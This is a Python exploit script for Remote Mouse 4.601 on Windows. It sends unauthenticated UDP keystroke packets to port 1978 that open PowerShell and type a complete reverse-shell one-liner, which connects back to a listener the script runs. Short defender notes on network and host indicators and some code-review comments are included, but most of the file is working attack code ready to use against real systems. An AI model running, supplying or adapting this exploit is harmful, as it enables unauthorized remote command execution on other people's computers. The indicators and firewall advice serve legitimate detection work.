# Exploit Title: Remote Mouse 4.601 - Remote Code Execution
# Date: 14/07/2025
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://www.remotemouse.net
# Software Link: https://www.remotemouse.net/downloads
# Version: 4.601 (Windows)
# Tested on: Windows 10 / Windows 11
# CVE: Pending

'''
Description:
This exploit targets Remote Mouse 4.6.0.1 (written "4.601" in the header
above) by sending UDP packets that simulate keyboard input in order to
execute arbitrary PowerShell commands. The vulnerability lies in the way
Remote Mouse processes unauthenticated UDP commands on port 1978: specially
crafted packets are accepted and acted on as keystrokes.
'''

# Reviewer notes for defenders, derived only from what this script sends:
#   * Wire format: every datagram is the ASCII text "key", a zero-padded
#     three-digit length, then the text to type (see send_udp / exploit).
#     Inbound UDP/1978 datagrams starting with "key" from a host that is not
#     a paired controller are the network-level indicator.
#   * Host-level indicator: a PowerShell process started from the desktop
#     session right after such datagrams, followed by an outbound TCP
#     connection from that PowerShell process (here to LHOST:LPORT).
#     Process-creation and network-connection telemetry both cover this.
#   * Exposure: the service listens on TCP and UDP 1978 (the TCP side is what
#     check_target probes). Limiting that port to trusted hosts with the host
#     firewall removes the unauthenticated path this script relies on.

import socket
import time
import threading

# Lab addresses hard-coded by the author: the machine running Remote Mouse
# and the machine that receives the callback.
TARGET_IP = "192.168.8.104"
TARGET_PORT = 1978
LHOST = "192.168.8.103"
LPORT = 4444

# PowerShell one-liner that is typed into the target. It opens a TCP client to
# LHOST:LPORT, evaluates each received chunk with `iex`, and writes the output
# plus a "PS <path>> " prompt back over the same stream. The doubled braces
# are f-string escapes for literal PowerShell braces.
PS_REVERSE_SHELL = f"$c=New-Object Net.Sockets.TCPClient('{LHOST}',{LPORT});$s=$c.GetStream();[byte[]]$b=0..65535|%{{0}};while(($i=$s.Read($b,0,$b.Length))){{;$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$o=(iex $d 2>&1|Out-String);$o+='PS '+(pwd).Path+'> ';$s.Write(([text.encoding]::ASCII).GetBytes($o),0,$o.Length);$s.Flush()}};$c.Close()"


def check_target() -> bool:
    """Return True when the TCP banner on TARGET_PORT contains "nop 510".

    Connects over TCP with a 3-second timeout, reads up to 1024 bytes and
    looks for the substring "nop 510". Any failure yields False.
    """
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(3)
            s.connect((TARGET_IP, TARGET_PORT))
            data = s.recv(1024).decode().strip()
            # NOTE(review): "nop 510" is presumably the banner of an instance
            # with no password configured -- this file does not establish
            # that; confirm against the product before relying on it.
            return "nop 510" in data
    # NOTE(review): bare except also swallows KeyboardInterrupt and decode
    # errors, so "not vulnerable" is reported for any failure, including an
    # unreachable host.
    except:
        return False


def send_udp(payload: str) -> None:
    """Send *payload* as one UDP datagram to TARGET_IP:TARGET_PORT.

    Nothing is read back, so the sender gets no confirmation that the
    datagram was received or acted on.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.sendto(payload.encode(), (TARGET_IP, TARGET_PORT))


def exploit() -> None:
    """Check the banner, start a local listener, then send the key sequence.

    The function never returns after the sequence is sent: the main thread
    sleeps in a loop while the daemon listener thread handles the session.
    """
    if not check_target():
        print("[-] Target not vulnerable")
        return

    def listener() -> None:
        # Accepts exactly one inbound connection on LHOST:LPORT and relays
        # lines between stdin/stdout and that connection.
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            s.bind((LHOST, LPORT))
            s.listen(1)
            conn, addr = s.accept()  # addr is not used afterwards
            conn.sendall(b'\r\n')
            while True:
                response = conn.recv(8192).decode(errors='ignore')
                if not response:
                    break
                print(response, end='')
                cmd = input()
                if cmd.lower() == 'exit':
                    break
                conn.sendall(cmd.encode() + b'\r\n')
            # NOTE(review): conn is closed only on the normal exit paths; an
            # exception in the loop leaves it to interpreter teardown.
            conn.close()

    threading.Thread(target=listener, daemon=True).start()
    time.sleep(1)  # give the listener time to bind before anything is sent

    # Each tuple is (text to type, seconds to wait afterwards). Every entry is
    # framed as "key" + 3-digit zero-padded length + text.
    # NOTE(review): "win" presumably maps to the Windows key and "[noe]" is
    # presumably a protocol flag on typed text -- neither is defined in this
    # file; confirm against the protocol.
    for cmd, delay in [("win",0.5),("[noe]powershell",1),("\r",2.5),(f"[noe]{PS_REVERSE_SHELL}",0.5),("\r",0)]:
        send_udp(f"key{len(cmd):03d}{cmd}")
        time.sleep(delay)

    print("[+] Exploit completed. Waiting for shell...")
    # Keeps the process alive for the daemon thread. Typing 'exit' in the
    # listener only ends that thread; this loop continues until interrupted.
    while True:
        time.sleep(1)


if __name__ == "__main__":
    exploit()